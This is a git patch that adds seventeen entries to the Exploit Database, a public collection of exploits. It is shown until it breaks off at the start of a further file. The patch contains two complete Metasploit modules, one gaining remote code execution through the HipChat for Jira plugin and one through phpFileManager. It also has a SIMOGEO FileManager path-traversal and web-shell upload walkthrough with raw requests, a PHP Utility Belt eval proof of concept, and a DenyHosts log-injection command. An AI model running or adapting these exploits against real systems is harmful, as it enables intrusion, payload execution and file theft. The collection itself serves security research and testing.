From fa0d0d29073ffeec961c635a29b806449d4b050c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 9 Dec 2015 05:02:11 +0000 Subject: [PATCH] DB: 2015-12-09 17 new exploits --- files.csv | 17 + platforms/linux/dos/38909.txt | 7 + platforms/multiple/remote/38905.rb | 643 +++++++++++++++++++++++++++++ platforms/php/remote/38900.rb | 115 ++++++ platforms/php/webapps/38895.txt | 124 ++++++ platforms/php/webapps/38901.txt | 28 ++ platforms/php/webapps/38902.txt | 29 ++ platforms/php/webapps/38906.txt | 120 ++++++ platforms/php/webapps/38907.txt | 111 +++++ platforms/php/webapps/38908.txt | 7 + platforms/windows/dos/38878.txt | 36 ++ platforms/windows/local/38903.txt | 92 +++++ platforms/windows/local/38904.txt | 106 +++++ platforms/windows/remote/38910.txt | 11 + platforms/xml/webapps/38896.py | 288 +++++++++++++ platforms/xml/webapps/38897.txt | 78 ++++ platforms/xml/webapps/38898.txt | 121 ++++++ platforms/xml/webapps/38899.txt | 45 ++ 18 files changed, 1978 insertions(+) create mode 100755 platforms/linux/dos/38909.txt create mode 100755 platforms/multiple/remote/38905.rb create mode 100755 platforms/php/remote/38900.rb create mode 100755 platforms/php/webapps/38895.txt create mode 100755 platforms/php/webapps/38901.txt create mode 100755 platforms/php/webapps/38902.txt create mode 100755 platforms/php/webapps/38906.txt create mode 100755 platforms/php/webapps/38907.txt create mode 100755 platforms/php/webapps/38908.txt create mode 100755 platforms/windows/dos/38878.txt create mode 100755 platforms/windows/local/38903.txt create mode 100755 platforms/windows/local/38904.txt create mode 100755 platforms/windows/remote/38910.txt create mode 100755 platforms/xml/webapps/38896.py create mode 100755 platforms/xml/webapps/38897.txt create mode 100755 platforms/xml/webapps/38898.txt create mode 100755 platforms/xml/webapps/38899.txt diff --git a/files.csv b/files.csv index a10d6b3e2..6257ba24d 100755 --- a/files.csv +++ b/files.csv @@ -35143,6 +35143,7 @@ id,file,description,date,author,platform,type,port 38875,platforms/php/webapps/38875.php,"osCMax Arbitrary File Upload and Full Path Information Disclosure Vulnerabilities",2013-12-09,KedAns-Dz,php,webapps,0 38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator /auction/casp/admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0 +38878,platforms/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash PoC",2015-12-06,Un_N0n,windows,dos,0 38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator Multiple SQL Injection Vulnerabilities",2013-12-14,R3d-D3V!L,asp,webapps,0 38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0 38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0 @@ -35157,3 +35158,19 @@ id,file,description,date,author,platform,type,port 38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 +38895,platforms/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80 +38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0 +38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection Vulnerability",2015-12-08,LiquidWorm,xml,webapps,0 +38898,platforms/xml/webapps/38898.txt,"OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities",2015-12-08,LiquidWorm,xml,webapps,0 +38899,platforms/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure Vulnerability",2015-12-08,LiquidWorm,xml,webapps,0 +38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 Remote Code Execution",2015-12-08,metasploit,php,remote,80 +38901,platforms/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,php,webapps,80 +38902,platforms/php/webapps/38902.txt,"WordPress Polls Widget Plugin 1.0.7 - SQL Injection Vulnerability",2015-12-08,WICS,php,webapps,80 +38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 +38904,platforms/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 +38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin Velocity Template Injection",2015-12-08,metasploit,multiple,remote,8080 +38906,platforms/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,php,webapps,80 +38907,platforms/php/webapps/38907.txt,"Osclass Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps,0 +38908,platforms/php/webapps/38908.txt,"Leed 'id' Parameter SQL Injection Vulnerability",2013-12-18,"Alexandre Herzog",php,webapps,0 +38909,platforms/linux/dos/38909.txt,"DenyHosts 'regex.py' Remote Denial of Service Vulnerability",2013-12-19,"Helmut Grohne",linux,dos,0 +38910,platforms/windows/remote/38910.txt,"Hancom Office '.hml' File Processing Heap Buffer Overflow Vulnerability",2013-12-19,diroverflow,windows,remote,0 diff --git a/platforms/linux/dos/38909.txt b/platforms/linux/dos/38909.txt new file mode 100755 index 000000000..25ab4756a --- /dev/null +++ b/platforms/linux/dos/38909.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/64478/info + +DenyHosts is prone to a remote denial-of-service vulnerability. + +Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users. + +ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21 \ No newline at end of file diff --git a/platforms/multiple/remote/38905.rb b/platforms/multiple/remote/38905.rb new file mode 100755 index 000000000..2358d2ae1 --- /dev/null +++ b/platforms/multiple/remote/38905.rb @@ -0,0 +1,643 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'json' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "Atlassian HipChat for Jira Plugin Velocity Template Injection", + 'Description' => %q{ + Atlassian Hipchat is a web service for internal instant messaging. A plugin is available + for Jira that allows team collibration at real time. A message can be used to inject Java + code into a Velocity template, and gain code exeuction as Jira. Authentication is required + to exploit this vulnerability, and you must make sure the account you're using isn't + protected by captcha. By default, Java payload will be used because it is cross-platform, + but you can also specify which native payload you want (Linux or Windows). + + HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions + between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with + a vulnerable copy of HipChat. + + When using the check command, if you supply a valid username and password, the module + will be able to trigger the bug and check more accurately. If not, it falls back to + passive, which can only tell if the target is running on a Jira version that is bundled + with a vulnerable copy of Hipchat by default, which is less reliable. + + This vulnerability was originally discovered internally by Atlassian. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Chris Wood', # PoC + 'sinn3r' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2015-5603' ], + [ 'EDB', '38551' ], + [ 'BID', '76698' ], + [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ] + ], + 'Targets' => + [ + [ 'HipChat for Jira plugin on Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], + [ 'HipChat for Jira plugin on Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], + [ 'HipChat for Jira plugin on Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] + ], + 'DefaultOptions' => + { + 'RPORT' => 8080 + }, + 'Privileged' => false, + 'DisclosureDate' => 'Oct 28 2015', + 'DefaultTarget' => 0 + )) + + register_options( + [ + # Auth is required, but when we use the check command we allow them to be optional. + OptString.new('JIRAUSER', [false, 'Jira Username', '']), + OptString.new('JIRAPASS', [false, 'Jira Password', '']), + OptString.new('TARGETURI', [true, 'The base to Jira', '/']) + ], self.class) + end + + + # Returns a cookie in a hash, so you can ask for a specific parameter. + # + # @return [Hash] + def get_cookie_as_hash(cookie) + Hash[*cookie.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/).flatten] + end + + + # Checks the target by actually triggering the bug. + # + # @return [Array] Exploit::CheckCode::Vulnerable if bug was triggered. + # Exploit::CheckCode::Unknown if something failed. + # Exploit::CheckCode::Safe for the rest. + def do_explicit_check + begin + cookie = do_login + # I don't really care which command to execute, as long as it's a valid one for both platforms. + # If the command is valid, it should return {"message"=>"0"}. + # If the command is not valid, it should return an empty hash. + c = get_exec_code('whoami') + res = inject_template(c, cookie) + json = res.get_json_document + if json['message'] && json['message'] == '0' + return Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Safe + end + + + # Returns the Jira version + # + # @return [String] Found Jira version + # @return [NilClass] No Jira version found. + def get_jira_version + version = nil + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa') + }) + + unless res + vprint_error('Connection timed out while retrieving the Jira version.') + return version + end + + metas = res.get_html_meta_elements + + version_element = metas.select { |m| + m.attributes['name'] && m.attributes['name'].value == 'ajs-version-number' + }.first + + unless version_element + vprint_error('Unable to find the Jira version.') + return version + end + + version_element.attributes['content'] ? version_element.attributes['content'].value : nil + end + + + # Checks the target by looking at things like the Jira version, or whether the Jira web app + # exists or not. + # + # @return [Array] Check code. If the Jira version matches the vulnerable range, it returns + # Exploit::CheckCode::Appears. If we can only tell it runs on Jira, we return + # Exploit::CheckCode::Detected, because it's possible to have Jira not bundled + # with HipChat by default, but installed separately. For other scenarios, we + # return Safe. + def do_passive_check + jira_version = get_jira_version + vprint_status("Found Jira version: #{jira_version}") + if jira_version && jira_version >= '6.3.5' && jira_version < '6.4.11' + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + + # Checks the vulnerability. Username and password are required to be able to accurately verify + # the vuln. If supplied, we will try the explicit check (which will trigger the bug, so should + # be more reliable). If not, we will try the passive one (less accurately, but better than + # nothing). + # + # @see #do_explicit_check + # @see #do_passive_check + # + # @return [Array] Check code + def check + checkcode = Exploit::CheckCode::Safe + + if jira_cred_empty? + vprint_status("No username and password supplied, so we can only do a passive check.") + checkcode = do_passive_check + else + checkcode = do_explicit_check + end + + checkcode + end + + + # Returns the Jira username set by the user + def jira_username + datastore['JIRAUSER'] + end + + + # Returns the Jira password set by the user + def jira_password + datastore['JIRAPASS'] + end + + + # Reports username and password to the database. + # + # @param opts [Hash] + # @option opts [String] :user + # @option opts [String] :password + # + # @return [void] + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + post_reference_name: self.refname, + private_data: opts[:password], + origin_type: :service, + private_type: :password, + username: opts[:user] + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + last_attempted_at: Time.now + }.merge(service_data) + + create_credential_login(login_data) + end + + + # Returns a valid login cookie. + # + # @return [String] + def do_login + cookie = '' + + prerequisites = get_login_prerequisites + xsrf = prerequisites['atlassian.xsrf.token'] + sid = prerequisites['JSESSIONID'] + uri = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }, + 'cookie' => "atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}", + 'vars_post' => { + 'os_username' => jira_username, + 'os_password' => jira_password, + 'os_captcha' => '' # Not beatable yet + } + }) + + unless res + fail_with(Failure::Unknown, 'Connection timed out while trying to login') + end + + json = res.get_json_document + + if json.empty? + fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.') + end + + if json['loginSucceeded'] + cookie = res.get_cookies + elsif !json['loginSucceeded'] && json['captchaFailure'] + fail_with(Failure::NoAccess, "#{jira_username} is protected by captcha. Please try a different account.") + elsif !json['loginSucceeded'] + fail_with(Failure::NoAccess, 'Incorrect username or password') + end + + report_cred( + user: jira_username, + password: jira_password + ) + + cookie + end + + + # Returns login prerequisites + # + # @return [Hash] + def get_login_prerequisites + uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa') + res = send_request_cgi({ 'uri' => uri }) + + unless res + fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites') + end + + get_cookie_as_hash(res.get_cookies) + end + + + # Returns the target platform. + # + # @param cookie [String] Jira cookie + # @return [String] + def get_target_platform(cookie) + c = get_os_detection_code + res = inject_template(c, cookie) + json = res.get_json_document + json['message'] || '' + end + + + # Returns Java code that can be used to inject to the template in order to write a file. + # + # @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code, + # and then execute the new file instead. + # + # @param fname [String] File to write to. + # @param p [String] Payload + # @return [String] + def get_write_file_code(fname, p) + b64 = Rex::Text.encode_base64(p) + %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) | + end + + + # Returns the Java code that gives us the remote Java home path. + # + # @return [String] + def get_java_path_code + get_java_property_code('java.home') + end + + + # Returns the OS/platform information. + # + # @return [String] + def get_os_detection_code + get_java_property_code('os.name') + end + + + # Returns the temp path for Java. + # + # @return [String] + def get_temp_path_code + get_java_property_code('java.io.tmpdir') + end + + + # Returns a system property for Java. + # + # @param prop [String] Name of the property to retrieve. + # @return [String] + def get_java_property_code(prop) + %Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() | + end + + + # Returns the Java code to execute a jar file. + # + # @param java_path [String] Java home path + # @param war_path [String] The jar file to execute + # @return [String] + def get_jar_exec_code(java_path, war_path) + # A quick way to check platform instead of actually grabbing os.name in Java system properties. + if /^\/[[:print:]]+/ === war_path + normalized_java_path = Rex::FileUtils.normalize_unix_path(java_path, '/bin/java') + cmd_str = %Q|#{normalized_java_path} -jar #{war_path}| + else + normalized_java_path = Rex::FileUtils.normalize_win_path(java_path, '\\bin\\java.exe') + war_path.gsub!(/Program Files/, 'PROGRA~1') + cmd_str = %Q|cmd.exe /C #{normalized_java_path} -jar #{war_path}"| + end + + %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd_str}').waitFor() | + end + + + # Returns Java code that can be used to inject to the template in order to execute a file. + # + # @param cmd [String] command to execute + # @return [String] + def get_exec_code(cmd) + %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd}').waitFor() | + end + + + # Returns Java code that can be used to inject to the template in order to chmod a file. + # + # @param fname [String] File to chmod + # @return [String] + def get_chmod_code(fname) + get_exec_code("chmod 777 #{fname}") + end + + + # Returns Java code that can be used to inject to the template in order to copy a file. + # + # @note The purpose of this method is to have a file that is not busy, so we can execute it. + # It is meant to be used with #get_write_file_code. + # + # @param fname [String] The file to copy + # @param new_fname [String] The new file + # @return [String] + def get_dup_file_code(fname, new_fname) + if fname =~ /^\/[[:print:]]+/ + cp_cmd = "cp #{fname} #{new_fname}" + else + cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}" + end + + get_exec_code(cp_cmd) + end + + + # Returns a boolean indicating whether the module has a username and password. + # + # @return [TrueClass] There is an empty cred. + # @return [FalseClass] No empty cred. + def jira_cred_empty? + jira_username.blank? || jira_password.blank? + end + + + # Injects Java code to the template. + # + # @param p [String] Code that is being injected. + # @param cookie [String] A cookie that contains a valid JSESSIONID + # @return [void] + def inject_template(p, cookie) + login_sid = get_cookie_as_hash(cookie)['JSESSIONID'] + + uri = normalize_uri(target_uri.path, 'rest', 'hipchat', 'integrations', '1.0', 'message', 'render') + uri << '/' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'cookie' => "JSESSIONID=#{login_sid}", + 'ctype' => 'application/json', + 'data' => { 'message' => p }.to_json + }) + + if !res + # This seems to trigger every time even though we're getting a shell. So let's downplay + # this a little bit. At least it's logged to allow the user to debug. + elog('Connection timed out in #inject_template') + elsif res && /Error report/ === res.body + print_error('Failed to inject and execute code:') + vprint_line(res.body) + elsif res + vprint_status("Server response:") + vprint_line res.body + end + + res + end + + + # Checks if the target os/platform is compatible with the module target or not. + # + # @return [TrueClass] Compatible + # @return [FalseClass] Not compatible + def target_platform_compat?(target_platform) + target.platform.names.each do |n| + if /^java$/i === n || /#{n}/i === target_platform + return true + end + end + + false + end + + + # Returns the normalized file path for payload. + # + # @return [String] + def normalize_payload_fname(tmp_path, fname) + # A quick way to check platform insteaf of actually grabbing os.name in Java system properties. + if /^\/[[:print:]]+/ === tmp_path + Rex::FileUtils.normalize_unix_path(tmp_path, fname) + else + Rex::FileUtils.normalize_win_path(tmp_path, fname) + end + end + + + # Returns a temp path from the remote target. + # + # @param cookie [String] Jira cookie + # @return [String] + def get_tmp_path(cookie) + c = get_temp_path_code + res = inject_template(c, cookie) + json = res.get_json_document + json['message'] || '' + end + + + # Returns the Java home path used by Jira. + # + # @param cookie [String] Jira cookie. + # @return [String] + def get_java_home_path(cookie) + c = get_java_path_code + res = inject_template(c, cookie) + json = res.get_json_document + json['message'] || '' + end + + + # Exploits the target in Java platform. + # + # @return [void] + def exploit_as_java(cookie) + tmp_path = get_tmp_path(cookie) + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + jar_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") + jar = payload.encoded_jar + java_home = get_java_home_path(cookie) + register_files_for_cleanup(jar_fname) + + if java_home.blank? + fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') + else + print_status("Found Java home path: #{java_home}") + end + + print_status("Attempting to write #{jar_fname}") + c = get_write_file_code(jar_fname, jar) + inject_template(c, cookie) + + print_status("Executing #{jar_fname}") + c = get_jar_exec_code(java_home, jar_fname) + inject_template(c, cookie) + end + + + # Exploits the target in Windows platform. + # + # @return [void] + def exploit_as_windows(cookie) + tmp_path = get_tmp_path(cookie) + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) + exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") + exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") + exe_fname.gsub!(/Program Files/, 'PROGRA~1') + exe_new_fname.gsub!(/Program Files/, 'PROGRA~1') + register_files_for_cleanup(exe_fname, exe_new_fname) + + print_status("Attempting to write #{exe_fname}") + c = get_write_file_code(exe_fname, exe) + inject_template(c, cookie) + + print_status("New file will be #{exe_new_fname}") + c = get_dup_file_code(exe_fname, exe_new_fname) + inject_template(c, cookie) + + print_status("Executing #{exe_new_fname}") + c = get_exec_code(exe_new_fname) + inject_template(c, cookie) + end + + + # Exploits the target in Linux platform. + # + # @return [void] + def exploit_as_linux(cookie) + tmp_path = get_tmp_path(cookie) + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) + new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) + register_files_for_cleanup(fname, new_fname) + + print_status("Attempting to write #{fname}") + p = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) + c = get_write_file_code(fname, p) + inject_template(c, cookie) + + print_status("chmod +x #{fname}") + c = get_exec_code("chmod 777 #{fname}") + inject_template(c, cookie) + + print_status("New file will be #{new_fname}") + c = get_dup_file_code(fname, new_fname) + inject_template(c, cookie) + + print_status("Executing #{new_fname}") + c = get_exec_code(new_fname) + inject_template(c, cookie) + end + + + def exploit + if jira_cred_empty? + fail_with(Failure::BadConfig, 'Jira username and password are required.') + end + + print_status("Attempting to login as #{jira_username}:#{jira_password}") + cookie = do_login + print_good("Successfully logged in as #{jira_username}") + + target_platform = get_target_platform(cookie) + print_status("Target being detected as: #{target_platform}") + + unless target_platform_compat?(target_platform) + fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') + end + + case target.name + when /java$/i + exploit_as_java(cookie) + when /windows$/i + exploit_as_windows(cookie) + when /linux$/i + exploit_as_linux(cookie) + end + + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + +end \ No newline at end of file diff --git a/platforms/php/remote/38900.rb b/platforms/php/remote/38900.rb new file mode 100755 index 000000000..04757343c --- /dev/null +++ b/platforms/php/remote/38900.rb @@ -0,0 +1,115 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'phpFileManager 0.9.8 Remote Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in phpFileManager + 0.9.8 which is a filesystem management tool on a single file. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'hyp3rlinx', # initial discovery + 'Jay Turla' # msf + ], + 'References' => + [ + [ 'EDB', '37709' ], + [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'Platform' => %w{ unix win }, + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['phpFileManager / Unix', { 'Platform' => 'unix' } ], + ['phpFileManager / Windows', { 'Platform' => 'win' } ] + ], + 'DisclosureDate' => 'Aug 28 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']), + ],self.class) + end + + def check + txt = Rex::Text.rand_text_alpha(8) + res = http_send_command("echo #{txt}") + + if res && res.body =~ /#{txt}/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + def push + uri = normalize_uri(target_uri.path) + + # To push the Enter button + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'vars_post' => { + 'frame' => '3', + 'pass' => '' # yep this should be empty + } + }) + + if res.nil? + vprint_error("#{peer} - Connection timed out") + fail_with(Failure::Unknown, "Failed to trigger the Enter button") + end + + if res && res.headers && res.code == 302 + print_good("#{peer} - Logged in to the file manager") + cookie = res.get_cookies + cookie + else + fail_with(Failure::Unknown, "#{peer} - Error entering the file manager") + end + end + + def http_send_command(cmd) + cookie = push + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path), + 'cookie' => cookie, + 'vars_get' => { + 'action' => '6', + 'cmd' => cmd + } + }) + unless res && res.code == 200 + fail_with(Failure::Unknown, "Failed to execute the command.") + end + res + end + + def exploit + http_send_command(payload.encoded) + end +end \ No newline at end of file diff --git a/platforms/php/webapps/38895.txt b/platforms/php/webapps/38895.txt new file mode 100755 index 000000000..be9273382 --- /dev/null +++ b/platforms/php/webapps/38895.txt @@ -0,0 +1,124 @@ +# Exploit Title: SIMOGEO FileManager 2.3.0 - Path Traversal Vulnerability +# Date: 2015-12-09 +# Exploit Author: HaHwul +# Exploit Author Blog: http://www.codeblack.net +# Vendor Homepage: https://github.com/simogeo/Filemanager +# Software Link: git clone http://github.com/simogeo/Filemanager.git +# Version: 2.3.0 +# Tested on: Debian [Wheezy] +# CVE : none + +Path Traversal Code +http://192.168.0.15/vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd + +Filtering Rules: "../" -> blank +Bypass Filtering : ....// -> deleted "../" -> ../ + +Attack Request +GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd HTTP/1.1 +Host: 192.168.0.15 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: keep-alive + +Response +HTTP/1.1 200 OK +Date: Tue, 08 Dec 2015 17:18:52 GMT +Server: Apache/2.2.16 (Debian) +X-Powered-By: PHP/5.3.3-7+squeeze19 +Content-Transfer-Encoding: Binary +Content-Length: 1383 +Content-Disposition: inline; filename="passwd" +Keep-Alive: timeout=15, max=100 +Connection: Keep-Alive +Content-Type: image/ + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +..snip.. + + +################################################### + + +# Exploit Title: SIMOGEO FileManager 2.3.0 - File Upload Vulnerability +# Date: 2015-12-09 +# Exploit Author: HaHwul +# Exploit Author Blog: http://www.codeblack.net +# Vendor Homepage: https://github.com/simogeo/Filemanager +# Software Link: git clone http://github.com/simogeo/Filemanager.git +# Version: 2.3.0 +# Tested on: Debian [Wheezy] +# CVE : none + +1. Upload File + +POST /vul_test/target/Filemanager/connectors/php/filemanager.php?config=filemanager.config.js HTTP/1.1 +Host: 192.168.0.15 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0 +Accept: application/json +Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cache-Control: no-cache +X-Requested-With: XMLHttpRequest +Referer: http://192.168.0.15/vul_test/target/Filemanager/ +Content-Length: 520 +Content-Type: multipart/form-data; boundary=---------------------------1675330531498115896355630737 +Connection: keep-alive +Pragma: no-cache + +-----------------------------1675330531498115896355630737 +Content-Disposition: form-data; name="mode" + +add +-----------------------------1675330531498115896355630737 +Content-Disposition: form-data; name="currentpath" + +/vul_test/target/Filemanager/userfiles/ +-----------------------------1675330531498115896355630737 +Content-Disposition: form-data; name="newfile"; filename="shell.txt" +Content-Type: text/plain + +echo "Write PHP WebShell Code"; + + +-----------------------------1675330531498115896355630737-- + + +2. Change File Extension(.txt -> .php or .html) & Upload Path Tampering(/userfiles -> /) + +GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=rename&old=%2Fvul_test%2Ftarget%2FFilemanager%2Fuserfiles%2Fshell.txt&new=....//shell.php&config=filemanager.config.js HTTP/1.1 +Host: 192.168.0.15 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Referer: http://192.168.0.15/vul_test/target/Filemanager/ +Connection: keep-alive + + +3. Call Uploaded File + +http://192.168.0.15/vul_test/target/Filemanager/userfiles/shell.php + +Response +HTTP/1.1 200 OK +Date: Tue, 08 Dec 2015 17:25:20 GMT +Server: Apache/2.2.16 (Debian) +X-Powered-By: PHP/5.3.3-7+squeeze19 +Vary: Accept-Encoding +Content-Length: 32 +Keep-Alive: timeout=15, max=100 +Connection: Keep-Alive +Content-Type: text/html + +echo "Write PHP WebShell Code"; + + + + diff --git a/platforms/php/webapps/38901.txt b/platforms/php/webapps/38901.txt new file mode 100755 index 000000000..fbbd3810e --- /dev/null +++ b/platforms/php/webapps/38901.txt @@ -0,0 +1,28 @@ +Exploit Title : PHP utility belt Remote Code Execution vulnerability +Author : WICS +Date : 8/12/2015 +Software Link : https://github.com/mboynes/php-utility-belt + +Overview: + + +PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it. +ajax.php is accessible without any authentication + +Vulnerable code (Line number 12 to 15) + +if ( isset( $_POST['code'] ) ) { + if ( false === eval( $_POST['code'] ) ) + echo 'PHP Error encountered, execution halted'; +} + + +POC +Access URL +http://127.0.0.1/php-utility-belt/ajax.php +in Post data type +code=fwrite(fopen('info.php','w'),''); + +above code will generate info.php file which will display php info +Shell link will be +http://127.0.0.1/php-utility-belt/info.php \ No newline at end of file diff --git a/platforms/php/webapps/38902.txt 